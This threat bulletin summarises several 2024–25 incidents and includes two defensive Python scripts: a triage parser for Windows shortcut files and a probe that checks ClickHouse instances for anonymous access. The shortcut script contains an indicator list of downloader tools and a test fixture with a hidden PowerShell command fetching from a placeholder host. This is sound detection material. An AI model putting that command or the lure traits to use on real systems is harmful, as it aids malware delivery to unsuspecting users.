03.02.25 Threat Report
BeyondTrust Zero-Day Breach Exposes SaaS Customers
BeyondTrust, a leading identity and access management firm, confirmed a security breach affecting 17 customers of its Remote Support SaaS platform. The breach was discovered on 2nd December 2024 and linked to a zero-day vulnerability in a third-party application.
How the Attack Happened:
- The attackers obtained an API key, which allowed them to reset local application passwords and gain unauthorised access to affected accounts.
- The breach remained undetected for an unspecified period, posing significant security risks to customers relying on BeyondTrust's remote support solutions.
- BeyondTrust patched the vulnerability and alerted affected clients.
Potential Impact:
- Unauthorised remote access to sensitive IT environments.
- Credential exposure and potential privilege escalation within compromised accounts.
- Risk of further lateral movement within affected organisations if credentials were reused elsewhere.
Recommendation:
✅ Change all credentials associated with BeyondTrust's Remote Support SaaS platform.
✅ Review access logs for any suspicious login attempts.
✅ Enable multi-factor authentication (MFA) to prevent unauthorised access.
✅ Stay updated on BeyondTrust's advisories and implement security patches immediately.
North Korean APT37 Targets Group Chats with Malicious LNK Files
APT37, a North Korean state-sponsored hacking group (also known as ScarCruft or Reaper), has been found distributing malicious LNK shortcut files via group chat applications. This new social engineering tactic tricks users into executing malware, granting attackers control over infected machines.
Attack Details:
- Attackers send LNK (Windows shortcut) files disguised as legitimate documents within chat groups.
- When opened, the LNK file executes malicious scripts that download additional malware onto the victim’s machine.
- The malware can steal sensitive information, install backdoors, or execute further payloads.
- The attack targets government entities, journalists, and organisations in industries of interest to North Korea (e.g., defence, technology, and intelligence).
Potential Impact:
- Espionage & data theft: APT37 is known for intelligence gathering and surveillance.
- Credential harvesting: The malware can collect usernames, passwords, and access tokens.
- Long-term persistence: Attackers use these infections to establish a foothold for future attacks.
Recommendation:
✅ Train employees on social engineering risks and avoiding unsolicited files in chat applications.
✅ Block LNK files in email and chat platforms where possible.
✅ Use endpoint detection and response (EDR) tools to identify malicious shortcuts and scripts.
✅ Apply security patches to prevent malware from exploiting software vulnerabilities.
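The detection advice above (block LNK files where possible, use EDR to spot malicious shortcuts) can be backed by a static triage of the shortcut format itself. The following Python script is an added example for this report, not code from the source or from any EDR vendor: it parses the MS-SHLLINK header and StringData sections of a .lnk file and flags the traits the APT37 lures rely on, namely a script-host target, downloader-style arguments, a minimised window and a borrowed document icon. The indicator list and thresholds are this example's own assumptions, and the two sample shortcuts are constructed in memory (the URL is a placeholder).

```python
"""Static triage of Windows .lnk shortcut files (MS-SHLLINK format).

Added example for this threat report, not code from the source or any vendor.
It parses the ShellLinkHeader and the StringData strings and flags shortcuts
that look like script-launching lures. The sample shortcuts are constructed
below as test fixtures; no real malware is involved.
"""
import struct
from dataclasses import dataclass, field
from typing import List, Tuple

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
SW_SHOWNORMAL, SW_SHOWMINNOACTIVE = 1, 7  # 7 = minimised, not activated: hides the console

# Heuristics (assumptions of this example, tune to your environment).
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}
ARG_INDICATORS = ("http://", "https://", "-enc", "hidden", "iex", "downloadstring",
                  "invoke-webrequest", "bitsadmin", "certutil")
LONG_ARGS = 260  # shortcut dialogs truncate here, so real shortcuts rarely exceed it


@dataclass
class LnkInfo:
    show_command: int
    name: str = ""
    relative_path: str = ""
    working_dir: str = ""
    arguments: str = ""
    icon_location: str = ""


def _read_string(data: bytes, off: int, unicode: bool) -> Tuple[str, int]:
    """StringData field: 2-byte character count followed by the characters."""
    (count,) = struct.unpack_from("<H", data, off)
    off += 2
    if unicode:
        return data[off:off + count * 2].decode("utf-16-le"), off + count * 2
    return data[off:off + count].decode("cp1252", errors="replace"), off + count


def parse_lnk(data: bytes) -> LnkInfo:
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a shell link file")
    (show_cmd,) = struct.unpack_from("<I", data, 0x3C)  # ShowCommand field
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:  # skip the IDList (size-prefixed)
        (size,) = struct.unpack_from("<H", data, off)
        off += 2 + size
    if flags & HAS_LINK_INFO:  # skip LinkInfo (size includes its own length field)
        (size,) = struct.unpack_from("<I", data, off)
        off += size
    info = LnkInfo(show_command=show_cmd)
    unicode = bool(flags & IS_UNICODE)
    for bit, attr in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if flags & bit:  # StringData fields appear in exactly this order
            value, off = _read_string(data, off, unicode)
            setattr(info, attr, value)
    return info


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(info: LnkInfo) -> List[str]:
    """Return human-readable reasons the shortcut deserves a closer look."""
    reasons = []
    target = _basename(info.relative_path)
    if target in SCRIPT_HOSTS:
        reasons.append(f"target is a script host: {target}")
    hits = [i for i in ARG_INDICATORS if i in info.arguments.lower()]
    if hits:
        reasons.append("downloader-style arguments: " + ", ".join(hits))
    if info.show_command == SW_SHOWMINNOACTIVE:
        reasons.append("window minimised (SW_SHOWMINNOACTIVE)")
    if len(info.arguments) > LONG_ARGS:
        reasons.append(f"unusually long arguments ({len(info.arguments)} chars)")
    icon = _basename(info.icon_location)
    if target in SCRIPT_HOSTS and icon and icon != target:
        reasons.append(f"icon borrowed from another program: {icon}")
    return reasons


def build_lnk(relative_path: str, arguments: str = "", icon_location: str = "",
              show_command: int = SW_SHOWNORMAL) -> bytes:
    """Construct a minimal .lnk in memory (test fixture only, not a dropper)."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH
    flags |= HAS_ARGUMENTS if arguments else 0
    flags |= HAS_ICON_LOCATION if icon_location else 0
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, arguments, icon_location) if s)
    return header + body


# Constructed samples: an ordinary shortcut and a lure-style one.
BENIGN_LNK = build_lnk(r"..\..\Windows\System32\notepad.exe",
                       icon_location=r"%SystemRoot%\System32\notepad.exe")
SUSPECT_LNK = build_lnk(
    r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    arguments='-WindowStyle Hidden -Command "Invoke-WebRequest http://placeholder.invalid/doc"',
    icon_location=r"%ProgramFiles%\Microsoft Office\root\Office16\WINWORD.EXE",
    show_command=SW_SHOWMINNOACTIVE)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_LNK), ("suspect", SUSPECT_LNK)):
        print(label, triage(parse_lnk(blob)) or ["no findings"])
```

Run the script on a real file with `triage(parse_lnk(open(path, "rb").read()))`; shortcuts arriving through chat or mail that score on the script-host and argument checks together are the ones worth quarantining, while the window and icon checks alone are weak signals and are better used to raise priority than to block.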
'Devil-Traff': A New Large-Scale SMS Phishing-as-a-Service Platform
Cyber criminals have developed a new phishing-as-a-service (PhaaS) platform called "Devil-Traff", which allows threat actors to send bulk phishing SMS messages at scale.
This turnkey phishing platform lowers the barrier for cybercriminals, making mass smishing (SMS phishing) attacks easier and more accessible than ever before.
How It Works:
- Devil-Traff operates as a dark web service, enabling non-technical criminals to conduct phishing campaigns without writing any code.
- Attackers use fake bank alerts, delivery notifications, or payment fraud messages to lure victims into entering personal information on malicious websites.
- The platform provides automation features to send hundreds of thousands of SMS messages per day.
- Some variants also distribute mobile malware that can steal authentication credentials and payment data.
Potential Impact:
- Financial fraud: Victims unknowingly provide banking credentials.
- Identity theft: Attackers can harvest personal data for further cybercrime.
- Credential stuffing attacks: Stolen credentials are used for hacking into multiple accounts.
Recommendation:
✅ Warn employees and customers about SMS phishing attacks.
✅ Block known phishing domains and monitor for suspicious URLs.
✅ Encourage multi-factor authentication (MFA) to prevent credential theft from leading to account takeovers.
✅ Deploy mobile security solutions that can detect and block malicious links.
Microsoft Advertisers Targeted via Malicious Google Ads
Cyber criminals have launched a targeted phishing campaign against Microsoft advertisers by creating fraudulent Google Ads that redirect users to credential-stealing websites.
Attack Details:
- Hackers purchase Google Ads and use SEO poisoning techniques to make their fake ads appear at the top of search results.
- Clicking on the malicious ads redirects victims to phishing websites that closely mimic Microsoft’s official login portals.
- Attackers then harvest credentials to compromise corporate Microsoft accounts, leading to data breaches and account takeovers.
Potential Impact:
- Compromised Microsoft accounts could be used for further phishing attacks within organisations.
- Data theft & unauthorised access to sensitive corporate information.
- Financial losses from fraudulent transactions if attackers gain control of advertising accounts.
Recommendation:
✅ Be cautious when clicking on advertisements, even those appearing at the top of Google search results.
✅ Verify website URLs before entering credentials.
✅ Enable multi-factor authentication (MFA) on all Microsoft accounts.
✅ Consider using ad-blocking extensions to limit exposure to malicious ads.
CISA Warning: Critical Vulnerabilities in Contec Health CMS8000 Patient Monitors
The Cybersecurity and Infrastructure Security Agency (CISA) has issued a security advisory regarding multiple vulnerabilities in the Contec Health CMS8000 Patient Monitor, which is used in medical facilities worldwide.
Key Vulnerabilities:
- Out-of-bounds write: Could allow remote code execution (RCE).
- Hardcoded backdoor accounts: Enables unauthorised access to patient data.
- Privacy leakage: Attackers could intercept confidential patient information.
Potential Impact:
- Remote hijacking of patient monitoring systems.
- Data breaches exposing sensitive medical records.
- Regulatory penalties for healthcare providers failing to secure medical devices.
Recommendation:
✅ Immediately update firmware on all affected devices.
✅ Ensure CMS8000 monitors are not exposed to the public internet.
✅ Use network segmentation to prevent unauthorised access.
DeepSeek AI Database Exposed: Over 1 Million Log Lines, Secret Keys Leaked
Buzzy Chinese artificial intelligence (AI) startup DeepSeek, which has seen a meteoric rise in popularity, left one of its databases exposed on the internet, potentially allowing malicious actors to access sensitive data.
The ClickHouse database, which was publicly accessible, allowed full control over database operations, including access to internal data.
Attack Details:
- The exposed database contained over a million lines of log streams, including:
  - Chat history
  - Secret keys
  - Backend details
  - API secrets
  - Operational metadata
- The database was accessible without authentication, meaning anyone could have accessed it using ClickHouse’s HTTP interface via a web browser.
- The security hole has since been patched following responsible disclosure from Wiz researchers.
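The exposure described above came down to a ClickHouse HTTP interface that answered queries without credentials. The following Python script is an added example for this report, not code from the source, Wiz, DeepSeek or ClickHouse: it sends the smallest possible query (`SELECT 1`) to an instance with no credentials and classifies the reply, so an owner can confirm their own databases refuse anonymous queries. The success body, the 516 authentication-failed code and the `X-ClickHouse-Exception-Code` header follow ClickHouse's HTTP interface; the sample responses used in the self-test are constructed.

```python
"""Exposure check for a ClickHouse HTTP interface (default port 8123).

Added example for this threat report, not code from the source or from any
vendor. It asks an instance to evaluate SELECT 1 without credentials and
reports whether anonymous queries are accepted.
"""
import urllib.error
import urllib.request
from enum import Enum
from typing import Optional


class Exposure(Enum):
    OPEN = "anonymous queries succeed"
    AUTH_REQUIRED = "authentication enforced"
    UNREACHABLE = "no HTTP listener reachable"
    UNKNOWN = "unexpected reply"


AUTH_FAILED_CODE = 516  # ClickHouse exception code AUTHENTICATION_FAILED


def classify(status: Optional[int], body: str,
             exception_code: Optional[int] = None) -> Exposure:
    """Classify one HTTP reply to an unauthenticated SELECT 1."""
    if status is None:
        return Exposure.UNREACHABLE
    if status == 200 and body.strip() == "1":
        return Exposure.OPEN  # the server ran our query with no credentials
    if (exception_code == AUTH_FAILED_CODE or status == AUTH_FAILED_CODE
            or "Authentication failed" in body):
        return Exposure.AUTH_REQUIRED
    return Exposure.UNKNOWN


def _exception_code(headers) -> Optional[int]:
    value = headers.get("X-ClickHouse-Exception-Code")
    return int(value) if value and value.isdigit() else None


def probe(base_url: str, timeout: float = 3.0) -> Exposure:
    """Probe one instance you own, e.g. probe('http://10.0.0.5:8123')."""
    url = base_url.rstrip("/") + "/?query=SELECT%201"
    req = urllib.request.Request(url, headers={"User-Agent": "clickhouse-exposure-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read(64).decode(errors="replace")
            return classify(resp.status, body, _exception_code(resp.headers))
    except urllib.error.HTTPError as err:  # ClickHouse reports errors as non-2xx
        body = err.read(256).decode(errors="replace")
        return classify(err.code, body, _exception_code(err.headers))
    except (urllib.error.URLError, OSError):  # refused, DNS failure, timeout
        return classify(None, "")


def audit(base_urls) -> dict:
    """Probe each listed instance and return {url: Exposure}."""
    return {url: probe(url) for url in base_urls}


if __name__ == "__main__":
    import sys
    for url, result in audit(sys.argv[1:]).items():
        print(f"{url}: {result.name} ({result.value})")
```

An instance that classifies as OPEN is running with the stock default user and no password. Fixing it in ClickHouse means giving the default user a `password_sha256_hex` in users.xml, restricting its `networks` block to the addresses that legitimately need it, and binding `listen_host` in config.xml to an internal interface rather than all interfaces, then re-running the probe to confirm the reply changes to AUTH_REQUIRED or UNREACHABLE.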
Potential Impact:
- Unauthorised access to DeepSeek’s AI systems, potentially compromising its intellectual property.
- Credential exposure could enable privilege escalation within DeepSeek’s environment.
- Risk of stolen AI models or sensitive operational metadata falling into the hands of competitors or cyber criminals.
- National security concerns surrounding DeepSeek’s ties to China have prompted scrutiny from the U.S. and European regulators.
Larger Concerns Around AI Security & Privacy
- The rapid adoption of AI services without proper security controls is inherently risky, as seen in this case.
- AI models handle massive volumes of sensitive data, requiring strict access controls to prevent leaks.
- Privacy regulators in Italy and Ireland have launched investigations into DeepSeek’s data handling and compliance practices.
- OpenAI and Microsoft are probing whether DeepSeek unlawfully used OpenAI's API outputs to train its own models, a process known as distillation.
Recommendation:
✅ Review AI security practices to prevent unintended data exposure.
✅ Enforce strong authentication controls on all AI-related databases.
✅ Monitor for unauthorised API access to detect potential data exfiltration or misuse.
✅ Stay compliant with evolving privacy regulations regarding AI and data security.